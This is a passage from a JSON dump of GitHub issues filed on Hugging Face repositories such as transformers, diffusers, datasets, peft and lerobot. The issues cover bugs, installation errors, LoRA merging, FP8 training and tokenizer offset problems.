split_dataset_by_node\n\n### Expected behavior\n\nexpecting the command \"from datasets.distributed import split_dataset_by_node\" can be ran successfully\n\n### Environment info\n\npython: 3.12", "url": "https://github.com/huggingface/datasets/issues/7688", "state": "open", "labels": [], "created_at": "2025-07-17T09:32:35Z", "updated_at": "2025-07-25T15:14:19Z", "comments": 3, "user": "yingtongxiong" }, { "repo": "huggingface/alignment-handbook", "number": 220, "title": "A little question: why num examples is much less than the total amount of my training dataset?", "body": "I am using this repo to SFT a model, and I notice that:\n\nI print the total amount of my training dataset, which is 7473\n\n`Number of raw training samples: 7473`\n\nBut during training, I find the log:\n\n[INFO|trainer.py:2314] 2025-07-17 17:03:23,908 >> ***** Running training *****\n[INFO|trainer.py:2315] 2025-07-17 17:03:23,908 >> Num examples = 698\n[INFO|trainer.py:2316] 2025-07-17 17:03:23,908 >> Num Epochs = 3\n[INFO|trainer.py:2317] 2025-07-17 17:03:23,908 >> Instantaneous batch size per device = 2\n[INFO|trainer.py:2320] 2025-07-17 17:03:23,908 >> Total train batch size (w. parallel, distributed & accumulation) = 32\n[INFO|trainer.py:2321] 2025-07-17 17:03:23,908 >> Gradient Accumulation steps = 4\n[INFO|trainer.py:2322] 2025-07-17 17:03:23,908 >> Total optimization steps = 66\n[INFO|trainer.py:2323] 2025-07-17 17:03:23,910 >> Number of trainable parameters = 7,612,756,480\n\nI am using a machine with 8 A100. Could anyone explain it? I am afraid I didn't use the whole dataset but only 698 of 7473 samples to train...", "url": "https://github.com/huggingface/alignment-handbook/issues/220", "state": "closed", "labels": [], "created_at": "2025-07-17T09:12:08Z", "updated_at": "2025-07-23T23:30:33Z", "comments": 3, "user": "Red-Scarff" }, { "repo": "huggingface/diffusers", "number": 11945, "title": "Floating point exception with nightly PyTorch and CUDA", "body": "### Describe the bug\n\nWhen running any code snippet using diffusers it fails with floating point exception, and doesn't print any traceback.\n\nFor example this one would cause the issue (the example of Stable Diffusion 3.5 medium):\n\n```\nimport torch\nfrom diffusers import StableDiffusion3Pipeline\n\npipe = StableDiffusion3Pipeline.from_pretrained(\"stabilityai/stable-diffusion-3.5-medium\", torch_dtype=torch.bfloat16)\npipe = pipe.to(\"cuda\")\n\nimage = pipe(\n \"A capybara holding a sign that reads Hello World\",\n num_inference_steps=40,\n guidance_scale=4.5,\n).images[0]\nimage.save(\"capybara.png\")\n```\n\n\nThe issue could be with upstream PyTorch or CUDA, but we'd need to identify what of Diffusers is causing it.\n\n### Reproduction\n\nNot too sure as it's my first time with Diffusers but as suggested by [John6666](https://discuss.huggingface.co/u/John6666/summary) any NVIDIA GeForce RTX 5000 series... In my case it's a 16gb 5060 Ti. Perhaps CUDA 575.57.08 with CUDA version 12.9 and/or PyTorch 2.9.0.dev20250716+cu129?\n\n### Logs\n\n```shell\nLet me know how can I retrieve any logs you might need.\n```\n\n### System Info\n\n`diffusers-cli env` also causes a Floating point exception, but here you have environment information:\n\n**OS**: Debian 12\n\n```\nnvidia-smi\nWed Jul 16 15:58:48 2025 \n+-----------------------------------------------------------------------------------------+\n| NVIDIA-SMI 575.57.08 Driver Version: 575.57.08 CUDA Version: 12.9 |\n|-----------------------------------------+------------------------+----------------------+\n| GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|=========================================+========================+======================|\n| 0 NVIDIA GeForce RTX 5060 Ti On | 00000000:01:00.0 On | N/A |\n| 0% 42C P5 4W / 180W | 10MiB / 16311MiB | 0% Default |\n| | | N/A |\n+-----------------------------------------+------------------------+----------------------+\n \n+-----------------------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=========================================================================================|\n| No running processes found |\n+-----------------------------------------------------------------------------------------+\n```\n\n```\npip list\nPackage Version\n------------------------ ------------------------\nbitsandbytes 0.46.1\ncertifi 2025.7.14\ncharset-normalizer 3.4.2\ndiffusers 0.34.0\nfilelock 3.18.0\nfsspec 2025.7.0\nhf-xet 1.1.5\nhuggingface-hub 0.33.4\nidna 3.10\nimportlib_metadata 8.7.0\nJinja2 3.1.6\nMarkupSafe 3.0.2\nmpmath 1.3.0\nnetworkx 3.5\nnumpy 2.3.1\nnvidia-cublas-cu12 12.9.1.4\nnvidia-cuda-cupti-cu12 12.9.79\nnvidia-cuda-nvrtc-cu12 12.9.86\nnvidia-cuda-runtime-cu12 12.9.79\nnvidia-cudnn-cu12 9.10.2.21\nnvidia-cufft-cu12 11.4.1.4\nnvidia-cufile-cu12 1.14.1.1\nnvidia-curand-cu12 10.3.10.19\nnvidia-cusolver-cu12 11.7.5.82\nnvidia-cusparse-cu12 12.5.10.65\nnvidia-cusparselt-cu12 0.7.1\nnvidia-nccl-cu12 2.27.5\nnvidia-nvjitlink-cu12 12.9.86\nnvidia-nvshmem-cu12 3.3.9\nnvidia-nvtx-cu12 12.9.79\npackaging 25.0\npillow 11.2.1\npip 23.0.1\npytorch-triton 3.4.0+gitae848267\nPyYAML 6.0.2\nregex 2024.11.6\nrequests 2.32.4\nsafetensors 0.5.3\nsetuptools 66.1.1\nsympy 1.14.0\ntorch 2.9.0.dev20250716+cu129\ntorchaudio 2.8.0.dev20250716+cu129\ntorchvision 0.24.0.dev20250716+cu129\ntqdm 4.67.1\ntriton 3.3.1\ntyping_extensions 4.14.1\nurllib3 2.5.0\nzipp 3.23.0\n```\n\nDon't hesitate to tell me any other info you might need.\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/11945", "state": "open", "labels": [ "bug" ], "created_at": "2025-07-17T03:16:02Z", "updated_at": "2025-08-02T13:48:05Z", "comments": 1, "user": "MxtAppz" }, { "repo": "huggingface/course", "number": 1009, "title": "How Transformers solve tasks - ASR section refers to task using Whisper but task actually uses Wav2Vec2", "body": "The [Automatic speech recognition](https://huggingface.co/learn/llm-course/chapter1/5?fw=pt#automatic-speech-recognition) segment of Section 1 \"Transformer Models\" > \"How \ud83e\udd17 Transformers solve tasks\" refers to \n\n> Check out our complete [automatic speech recognition guide](https://huggingface.co/docs/transformers/tasks/asr) to learn how to finetune Whisper and use it for inference!\n\nHowever the guide actually uses Wav2Vec2, not Whisper.\n\nThis is a dual request:\n\n1. Update the segment in question to refer to Wav2Vec2\n2. Update the task to use Whisper", "url": "https://github.com/huggingface/course/issues/1009", "state": "open", "labels": [], "created_at": "2025-07-16T23:25:55Z", "updated_at": "2025-07-16T23:25:55Z", "user": "renet10" }, { "repo": "huggingface/diffusers", "number": 11930, "title": "how to run convert_cosmos_to_diffusers.py correctly?", "body": "### Describe the bug\n\nhi. I have tried to convert the cosmos-transfer1's base model to diffuers using \"convert_cosmos_to_diffusers.py\" code with options --transformer_type Cosmo\ns-1.0-Diffusion-7B-Video2World --vae_type CV8x8x8-1.0 --transformer_ckpt_path ../fsdp_edge_v1/iter_000016000_ema_model_only.pt --output_path ./convert_to_diffusers\nbut I got error \n```Traceback (most recent call last):\n File \"/home1/jovyan/workspace/cosmos-transfer1/diffusers/../convert_cosmos_to_diffusers.py\", line 485, in \n transformer = convert_transformer(args.transformer_type, args.transformer_ckpt_path, weights_only)\n File \"/home1/jovyan/workspace/cosmos-transfer1/diffusers/../convert_cosmos_to_diffusers.py\", line 358, in convert_transformer\n transformer.load_state_dict(original_state_dict, strict=True, assign=True)\n File \"/opt/conda/envs/cosmos-transfer1/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 2581, in load_state_dict\n raise RuntimeError(\nRuntimeError: Error(s) in loading state_dict for CosmosTransformer3DModel:\n Missing key(s) in state_dict: \"transformer_blocks.3.norm1.linear_1.weight\", \"transformer_blocks.3.norm1.linear_2.weight\", \"transformer_blocks.3.attn1.norm_q.weight\", \"transformer_blocks.3.attn1.norm_k.weight\", \"transformer_blocks.3.attn1.to_q.weight\", \"transformer_blocks.3.attn1.to_k.weight\", \"transformer_blocks.3.attn1.to_v.weight\", \"transformer_blocks.3.attn1.to_out.0.weight\", \"transformer_blocks.3.norm2.linear_1.weight\", \"transformer_blocks.3.norm2.linear_2.weight\", \"transformer_blocks.3.attn2.norm_q.weight\", \"transformer_blocks.3.attn2.norm_k.weight\", \"transformer_blocks.3.attn2.to_q.weight\", \"transformer_blocks.3.attn2.to_k.weight\", \"transformer_blocks.3.attn2.to_v.weight\", \"transformer_blocks.3.attn2.to_out.0.weight\", \"transformer_blocks.3.norm3.linear_1.weight\", \"transformer_blocks.3.norm3.linear_2.weight\", \"transformer_blocks.3.ff.net.0.proj.weight\", \"transformer_blocks.3.ff.net.2.weight\", \"transformer_blocks.4.norm1.linear_1.weight\", \"transformer_blocks.4.norm1.linear_2.weight\", \"transformer_blocks.4.attn1.norm_q.weight\", \"transformer_blocks.4.attn1.norm_k.weight\", \"transformer_blocks.4.attn1.to_q.weight\", \"transformer_blocks.4.attn1.to_k.weight\", \"transformer_blocks.4.attn1.to_v.weight\", \"transformer_blocks.4.attn1.to_out.0.weight\", \"transformer_blocks.4.norm2.linear_1.weight\", \"transformer_blocks.4.norm2.linear_2.weight\", \"transformer_blocks.4.attn2.norm_q.weight\", \"transformer_blocks.4.attn2.norm_k.weight\", \"transformer_blocks.4.attn2.to_q.weight\", \"transformer_blocks.4.attn2.to_k.weight\", \"transformer_blocks.4.attn2.to_v.weight\", \"transformer_blocks.4.attn2.to_out.0.weight\", \"transformer_blocks.4.norm3.linear_1.weight\", \"transformer_blocks.4.norm3.linear_2.weight\", \"transformer_blocks.4.ff.net.0.proj.weight\", \"transformer_blocks.4.ff.net.2.weight\", \"transformer_blocks.5.norm1.linear_1.weight\", \"transformer_blocks.5.norm1.linear_2.weight\", \"transformer_blocks.5.attn1.norm_q.weight\", \"transformer_blocks.5.attn1.norm_k.weight\", \"transformer_blocks.5.attn1.to_q.weight\", \"transformer_blocks.5.attn1.to_k.weight\", \"transformer_blocks.5.attn1.to_v.weight\", \"transformer_blocks.5.attn1.to_out.0.weight\", \"transformer_blocks.5.norm2.linear_1.weight\", \"transformer_blocks.5.norm2.linear_2.weight\", \"transformer_blocks.5.attn2.norm_q.weight\", \"transformer_blocks.5.attn2.norm_k.weight\", \"transformer_blocks.5.attn2.to_q.weight\", \"transformer_blocks.5.attn2.to_k.weight\", \"transformer_blocks.5.attn2.to_v.weight\", \"transformer_blocks.5.attn2.to_out.0.weight\", \"transformer_blocks.5.norm3.linear_1.weight\", \"transformer_blocks.5.norm3.linear_2.weight\", \"transformer_blocks.5.ff.net.0.proj.weight\", \"transformer_blocks.5.ff.net.2.weight\", \"transformer_blocks.6.norm1.linear_1.weight\", \"transformer_blocks.6.norm1.linear_2.weight\", \"transformer_blocks.6.attn1.norm_q.weight\", \"transformer_blocks.6.attn1.norm_k.weight\", \"transformer_blocks.6.attn1.to_q.weight\", \"transformer_blocks.6.attn1.to_k.weight\", \"transformer_blocks.6.attn1.to_v.weight\", \"transformer_blocks.6.attn1.to_out.0.weight\", \"transformer_blocks.6.norm2.linear_1.weight\", \"transformer_blocks.6.norm2.linear_2.weight\", \"transformer_blocks.6.attn2.norm_q.weight\", \"transformer_blocks.6.attn2.norm_k.weight\", \"transformer_blocks.6.attn2.to_q.weight\", \"transformer_blocks.6.attn2.to_k.weight\", \"transformer_blocks.6.attn2.to_v.weight\", \"transformer_blocks.6.attn2.to_out.0.weight\", \"transformer_blocks.6.norm3.linear_1.weight\", \"transformer_blocks.6.norm3.linear_2.weight\", \"transformer_blocks.6.ff.net.0.proj.weight\", \"transformer_blocks.6.ff.net.2.weight\", \"transformer_blocks.7.norm1.linear_1.weight\", \"transformer_blocks.7.norm1.linear_2.weight\", \"transformer_blocks.7.attn1.norm_q.weight\", \"transformer_blocks.7.attn1.norm_k.weight\", \"transformer_blocks.7.attn1.to_q.weight\", \"transformer_blocks.7.attn1.to_k.weight\", \"transformer_blocks.7.attn1.to_v.weight\", \"transformer_blocks.7.attn1.to_out.0.weight\", \"transformer_blocks.7.norm2.linear", "url": "https://github.com/huggingface/diffusers/issues/11930", "state": "open", "labels": [ "bug" ], "created_at": "2025-07-15T16:20:09Z", "updated_at": "2025-07-15T16:24:47Z", "user": "dedoogong" }, { "repo": "huggingface/transformers", "number": 39426, "title": "object detection : matchin outputs.last_hidden_state with results", "body": "### Feature request\n\nit seems to me that would be possible with a little modification in the function post_process_object_detection\n\nwith\n```\n``for score, label, box, index in zip(scores, labels, boxes, indexes):\n results.append(\n {\n \"scores\": score[score > threshold],\n \"labels\": label[score > threshold],\n \"boxes\": box[score > threshold],\n \"indexes\": index[score > threshold],\n }\n )``\n```\n and then \n`outputs.last_hidden_state[0][results[0]['indexes']] `\ngives me the desired vector features\n\nAm I right or is there a better way to obtain this matching ? \n\nThanks for your help\n\n### Motivation\n\nI would like to use outputs.last_hidden_state as features for auxiliary tasks. So I need to know the label and the bounding box associated to one given vector of outputs.last_hidden_state\n\n### Your contribution\n\nI am not a top coder and do not know how to submit a PR", "url": "https://github.com/huggingface/transformers/issues/39426", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-07-15T13:34:08Z", "updated_at": "2025-07-22T11:08:23Z", "comments": 5, "user": "fenaux" }, { "repo": "huggingface/peft", "number": 2647, "title": "How can I merge the original model weights with LoRA weights?", "body": "I'm currently fine-tuning Qwen2.5_VL. Specifically, I used PEFT for LoRA fine-tuning on the linear layers of the LLM part. Meanwhile, I performed regular fine-tuning on other components like visual.merger and embed_tokens (with param.requires_grad set to True). After generating the files, as follow:\n\n\"Image\"\nI exported pytorch_model.bin using zero_to_fp32.py. When I printed the weight keys of the pytorch_model.bin file, I noticed that the original weights and LoRA weights weren't merged. Here's an example:\n\n```\nbase_model.model.model.language_model.layers.0.self_attn.q_proj.base_layer.weight: shape=(2048, 2048), dtype=torch.bfloat16\nbase_model.model.model.language_model.layers.0.self_attn.q_proj.base_layer.bias: shape=(2048,), dtype=torch.bfloat16\nbase_model.model.model.language_model.layers.0.self_attn.q_proj.lora_A.default.weight: shape=(8, 2048), dtype=torch.bfloat16\nbase_model.model.model.language_model.layers.0.self_attn.q_proj.lora_B.default.weight: shape=(2048, 8), dtype=torch.bfloat16\n```\n\nCould you tell me how to merge them? If I use\n`model = model.merge_and_unload()`\nI need the base_model. However, I no longer have the original base_model, and the original Qwen_2.5_VL model isn't suitable because apart from LoRA fine-tuning the linear layers, I also fine-tuned visual.merger and embed_tokens.\n\nHow can I solve this problem? Thank you!\n", "url": "https://github.com/huggingface/peft/issues/2647", "state": "closed", "labels": [], "created_at": "2025-07-15T11:40:33Z", "updated_at": "2025-08-23T15:03:44Z", "comments": 4, "user": "guoguo1314" }, { "repo": "huggingface/transformers", "number": 39421, "title": "Speculative Decoding(do_sample=False) get different outputs", "body": "> @transcend-0 hey!\n> \n> \n> \n> The issue was solved in [#30068](https://github.com/huggingface/transformers/pull/30068). You can install transformers from `main` with the following line for the correct generation with assisted decoding:\n> \n> \n> \n> `!pip install --upgrade git+https://github.com/huggingface/transformers.git` \n\n _Originally posted by @zucchini-nlp in [#30608](https://github.com/huggingface/transformers/issues/30608#issuecomment-2089846816)_\n\n### **System Info**\n\nPython 3.10.11\ntransformers 4.49.0\ntorch 2.6.0+cu124\n\n### **Same Reproduction**\nTarget_Model = Qwen2.5-32B-Instruct\nDraft_Model = Qwen2.5-7B-Instruct\n\n\n`question = \"Dienes are organic compounds with two adjacent double bonds in their structure, and they exhibit unique reactivity due to their conjugated pi-electron system. They play a significant role in organic chemistry and are involved in various chemical reactions and natural processes.\\nAmong the given options which one is the possible reactant (A) for the given reaction also mention the correct sequence of the dienes according to their reactivity ( most reactive to least reactive) B.\\nCyclohexene + A ---> 8,8-diiodobicyclo[4.2.0]octan-7-one\\n(B) 1. 2,3-dimethylbuta-1,3-diene, 2. (2E,4E)-hexa-2,4-diene, 3. (2E,4E)-hexa-2,4-diene, 4. (2Z,4Z)-hexa-2,4-diene\\n\\n\\nA. A = 2,2-diiodoethen-1-one, B = 3, 1, 2, 4\\nB. A = 2,2-diiodoethen-1-one, B = 4, 2, 1, 3\\nC. A = 4,4-diiodocyclobut-2-en-1-one, B = 3, 1, 2, 4\\nD. A = 4,4-diiodocyclobut-2-en-1-one, B = 4, 2, 1, 3\\n\\n\"`\n`prompt = '<|im_start|>user' + question + 'Please reason step-by-step and put your choice letter without any other text with \\\\boxed{} in the end.'`\n\n`['userDienes are organic compounds with two adjacent double bonds in their structure, and they exhibit unique reactivity due to their conjugated pi-electron system. They play a significant role in organic chemistry and are involved in various chemical reactions and natural processes.\\nAmong the given options which one is the possible reactant (A) for the given reaction also mention the correct sequence of the dienes according to their reactivity ( most reactive to least reactive) B.\\nCyclohexene + A ---> 8,8-diiodobicyclo[4.2.0]octan-7-one\\n(B) 1. 2,3-dimethylbuta-1,3-diene, 2. (2E,4E)-hexa-2,4-diene, 3. (2E,4E)-hexa-2,4-diene, 4. (2Z,4Z)-hexa-2,4-diene\\n\\n\\nA. A = 2,2-diiodoethen-1-one, B = 3, 1, 2, 4\\nB. A = 2,2-diiodoethen-1-one, B = 4, 2, 1, 3\\nC. A = 4,4-diiodocyclobut-2-en-1-one, B = 3, 1, 2, 4\\nD. A = 4,4-diiodocyclobut-2-en-1-one, B = 4, 2, 1, 3\\n\\nPlease reason step-by-step and put your choice letter without any other text with \\\\boxed{} in the end. To solve this problem, we need to identify the reactant \\\\( A \\\\) that can react with cyclohexene to form 8,8-diiodobicyclo[4.2.0]octan-7-one. We also need to determine the correct sequence of the dienes according to their reactivity from most reactive to least reactive.\\n\\n### Step-by-Step Reasoning:\\n\\n1. **Identify the Product:**\\n - The product is 8,8-diiodobicyclo[4.2.0]octan-7-one. This suggests that the reactant \\\\( A \\\\) must be a compound that can undergo a Diels-Alder reaction with cyclohexene to form the bicyclic structure and then iodination at the appropriate positions.\\n\\n2. **Reactant Identification:**\\n - The reactant \\\\( A \\\\) should be a dienophile (a compound with a double bond that can participate in a Diels-Alder reaction). Among the given options, the possible candidates are:\\n - 2,2-diiodoethen-1-one\\n - 4,4-diiodocyclobut-2-en-1-one\\n\\n3. **Diels-Alder Reaction:**\\n - Cyclohexene is a diene, and it will react with a dienophile to form a bicyclic structure. The dienophile should have a double bond that can react with the diene to form the desired product.\\n - 2,2-diiodoethen-1-one has a double bond and iodine substituents, making it a suitable dienophile.\\n - 4,4-diiodocyclobut-2-en-1-one also has a double bond but is more complex and less likely to form the desired product directly.\\n\\n4. **Sequence of Dienes According to Reactivity:**\\n - The reactivity of dienes depends on the stability of the conjugated pi-electron system.\\n - Generally, the order of reactivity from most reactive to least reactive is:\\n 1. (2E,4E)-hexa-2,4-diene (most stable and reactive)\\n 2. (2E,4E)-hexa-2,4-diene (same as above)\\n 3. 2,3-dimethylbuta-1,3-diene (less stable due to steric hindrance)\\n 4. (2Z,4Z)-hexa-2,4-diene (least stable due to cis configuration)\\n\\n5. **Matching Options:**\\n - Option A: \\\\( A = 2,2 \\\\)-diiodoethen-1-one, B = 3, 1, 2, 4\\n - Option B: \\\\( A = 2,2 \\\\)-diiodoethen-1-one, B = 4, 2, 1, 3\\n - Option C: \\\\( A = 4,4 \\\\)-diiodocyclobut-2-en-1-one, B = 3, 1, 2, 4\\n - Option D: \\\\( A = 4,4 \\\\)-diiodocyclobut-2-en-1-one, B = 4, 2, 1, 3\\n\\nGiven the correct sequence of dienes and the suitable dienophile, the correct option is:\\n\\n\\\\boxed{A}']`\n- targetDecoding - Running time: 41.82 s`\n\n`['userDienes are organic compounds with two adjacent double bonds in thei", "url": "https://github.com/huggingface/transformers/issues/39421", "state": "closed", "labels": [], "created_at": "2025-07-15T11:36:31Z", "updated_at": "2025-07-19T03:11:04Z", "comments": 13, "user": "nighty8" }, { "repo": "huggingface/lerobot", "number": 1508, "title": "so101_dualarm_triplecam config to evaluate ACT policy?", "body": "I recently fine-tuned an ACT policy where my data was from 3 cameras (1 overhead + 2 wrist) and two so101's. Then I tried to evaluate it but noticed there is currently a config file missing to support this. Does or will this support exist soon?", "url": "https://github.com/huggingface/lerobot/issues/1508", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-07-15T03:44:32Z", "updated_at": "2025-08-12T09:30:41Z", "user": "sebastiandavidlee" }, { "repo": "huggingface/transformers", "number": 39410, "title": "FP8 training support for Model Parallel / Tensor Parallel (MP/TP)", "body": "### Feature request\n\nI recieve message \"ValueError: The model you are trying to fine-tune is quantized with QuantizationMethod.FP8 but that quantization method do not support training. Please open an issue on GitHub: https://github.com/huggingface/transformers to request the support for training support for QuantizationMethod.FP8\" when trying to finetune a fp8 model.\nI have learned from the documentations that fp8 models can be trained with ddp, zero or fsdp. Is there a way to do it with MP/TP for huge fp8 models?\n\n### Motivation\n\nEnable finetuning huge fp8 models, like Qwen/Qwen3-235B-A22B-FP8\n\n### Your contribution\n\nI'm afraid it's too tough for me, but I'll do whatever I can if you need.", "url": "https://github.com/huggingface/transformers/issues/39410", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-07-15T02:13:05Z", "updated_at": "2025-07-15T13:30:27Z", "comments": 2, "user": "edgeinfinity1" }, { "repo": "huggingface/transformers", "number": 39409, "title": "TypeError: couldn't find storage object Float8_e4m3fnStorage - which version is needed for this?", "body": "Tested so many versions but can't find a version that won't give this error\n\n\n```\n!pip install bitsandbytes==0.45.0 --upgrade\n!pip install insightface --upgrade\n!pip install huggingface_hub==0.25.1 hf_transfer diffusers==0.31.0 transformers==4.36.0\n!pip uninstall xformers triton --yes\n!pip install torch==2.2.0+cu121 torchvision --index-url https://download.pytorch.org/whl/cu121\n!pip install xformers==0.0.24 --index-url https://download.pytorch.org/whl/cu121\n```\n\n```\n\n File \"/kaggle/temp/InstantID/gradio_demo/web-ui-multicontrolnet.py\", line 975, in generate_image\n reload_pipe(model_input, model_dropdown, scheduler, adapter_strength_ratio, enable_LCM, depth_type, lora_model_dropdown, lora_scale,test_all_loras,single_lora)\n File \"/kaggle/temp/InstantID/gradio_demo/web-ui-multicontrolnet.py\", line 654, in reload_pipe\n pipe = load_model(_pretrained_model_folder, model_to_load)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/kaggle/temp/InstantID/gradio_demo/web-ui-multicontrolnet.py\", line 528, in load_model\n pipeline = StableDiffusionPipeline.from_pretrained(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\n return fn(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/pipeline_utils.py\", line 896, in from_pretrained\n loaded_sub_model = load_sub_model(\n ^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 704, in load_sub_model\n loaded_sub_model = load_method(os.path.join(cached_folder, name), **loading_kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/transformers/modeling_utils.py\", line 4027, in from_pretrained\n dtype_orig = cls._set_default_torch_dtype(torch_dtype)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/transformers/modeling_utils.py\", line 1584, in _set_default_torch_dtype\n torch.set_default_dtype(dtype)\n File \"/usr/local/lib/python3.11/dist-packages/torch/__init__.py\", line 1009, in set_default_dtype\n _C._set_default_dtype(d)\nTypeError: couldn't find storage object Float8_e4m3fnStorage\n```\n\n", "url": "https://github.com/huggingface/transformers/issues/39409", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-15T01:51:08Z", "updated_at": "2025-08-02T12:06:59Z", "comments": 1, "user": "FurkanGozukara" }, { "repo": "huggingface/datasets", "number": 7682, "title": "Fail to cast Audio feature for numpy arrays in datasets 4.0.0", "body": "### Describe the bug\n\nCasting features with Audio for numpy arrays - done here with `ds.map(gen_sine, features=features)` fails\nin version 4.0.0 but not in version 3.6.0\n\n\n### Steps to reproduce the bug\n\nThe following `uv script` should be able to reproduce the bug in version 4.0.0\nand pass in version 3.6.0 on a macOS Sequoia 15.5\n\n```python\n# /// script\n# requires-python = \">=3.13\"\n# dependencies = [\n# \"datasets[audio]==4.0.0\",\n# \"librosa>=0.11.0\",\n# ]\n# ///\n# NAME\n# create_audio_dataset.py - create an audio dataset of sine waves\n#\n# SYNOPSIS\n# uv run create_audio_dataset.py\n#\n# DESCRIPTION\n# Create an audio dataset using the Hugging Face [datasets] library.\n# Illustrates how to create synthetic audio datasets using the [map]\n# datasets function.\n#\n# The strategy is to first create a dataset with the input to the\n# generation function, then execute the map function that generates\n# the result, and finally cast the final features.\n#\n# BUG\n# Casting features with Audio for numpy arrays -\n# done here with `ds.map(gen_sine, features=features)` fails\n# in version 4.0.0 but not in version 3.6.0\n#\n# This happens both in cases where --extra audio is provided and where is not.\n# When audio is not provided i've installed the latest compatible version\n# of soundfile.\n#\n# The error when soundfile is installed but the audio --extra is not\n# indicates that the array values do not have the `.T` property,\n# whilst also indicating that the value is a list instead of a numpy array.\n#\n# Last lines of error report when for datasets + soundfile case\n# ...\n#\n# File \"/Users/luasantilli/.cache/uv/archive-v0/tc_5IhQe7Zpw8ZXgQWpnl/lib/python3.13/site-packages/datasets/features/audio.py\", line 239, in cast_storage\n# storage = pa.array([Audio().encode_example(x) if x is not None else None for x in storage.to_pylist()])\n# ~~~~~~~~~~~~~~~~~~~~~~^^^\n# File \"/Users/luasantilli/.cache/uv/archive-v0/tc_5IhQe7Zpw8ZXgQWpnl/lib/python3.13/site-packages/datasets/features/audio.py\", line 122, in encode_example\n# sf.write(buffer, value[\"array\"].T, value[\"sampling_rate\"], format=\"wav\")\n# ^^^^^^^^^^^^^^^^\n# AttributeError: 'list' object has no attribute 'T'\n# ...\n#\n# For the case of datasets[audio] without explicit adding soundfile I get an FFmpeg\n# error.\n#\n# Last lines of error report:\n#\n# ...\n# RuntimeError: Could not load libtorchcodec. Likely causes:\n# 1. FFmpeg is not properly installed in your environment. We support\n# versions 4, 5, 6 and 7.\n# 2. The PyTorch version (2.7.1) is not compatible with\n# this version of TorchCodec. Refer to the version compatibility\n# table:\n# https://github.com/pytorch/torchcodec?tab=readme-ov-file#installing-torchcodec.\n# 3. Another runtime dependency; see exceptions below.\n# The following exceptions were raised as we tried to load libtorchcodec:\n#\n# [start of libtorchcodec loading traceback]\n# FFmpeg version 7: dlopen(/Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder7.dylib, 0x0006): Library not loaded: @rpath/libavutil.59.dylib\n# Referenced from: <6DB21246-F28A-31A6-910A-D8F3355D1064> /Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder7.dylib\n# Reason: no LC_RPATH's found\n# FFmpeg version 6: dlopen(/Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder6.dylib, 0x0006): Library not loaded: @rpath/libavutil.58.dylib\n# Referenced from: /Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder6.dylib\n# Reason: no LC_RPATH's found\n# FFmpeg version 5: dlopen(/Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder5.dylib, 0x0006): Library not loaded: @rpath/libavutil.57.dylib\n# Referenced from: /Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder5.dylib\n# Reason: no LC_RPATH's found\n# FFmpeg version 4: dlopen(/Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder4.dylib, 0x0006): Library not loaded: @rpath/libavutil.56.dylib\n# Referenced from: <6E59F017-C703-3AF6-A271-6277DD5F8170> /Users/luasantilli/.cache/uv/archive-v0/RK3IAlGfiICwDkHm2guLC/lib/python3.13/site-packages/torchcodec/libtorchcodec_decoder4.dylib\n# Reason: no LC_RPATH's found\n# ...\n#\n# This is strange because the the same error does not happen when using version", "url": "https://github.com/huggingface/datasets/issues/7682", "state": "closed", "labels": [], "created_at": "2025-07-14T18:41:02Z", "updated_at": "2025-07-15T12:10:39Z", "comments": 2, "user": "luatil-cloud" }, { "repo": "huggingface/lerobot", "number": 1507, "title": "[PI0] Evaluation result on the metaworld", "body": "Has anyone tried training pi0 on the Metaworld benchmark? My evaluation results are relatively low 30~%.", "url": "https://github.com/huggingface/lerobot/issues/1507", "state": "closed", "labels": [ "bug", "question", "policies", "simulation" ], "created_at": "2025-07-14T14:56:38Z", "updated_at": "2025-10-08T08:47:31Z", "user": "chenkang455" }, { "repo": "huggingface/transformers", "number": 39401, "title": "Qwen3 tokenizer wrong offset_mapping", "body": "### System Info\n\ntransformers 4.53.2, Ubuntu 22.04.4, python 3.11.13\n\n### Who can help?\n\n@ArthurZucker and @itazap There must be a problem with the `offset_mapping` of Qwen3 `tokenizer`. The starting point in the text for each token, except the first and the last, is one position behind. I compared it with the BERT's `tokenizer`, which produces what is expected:\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ 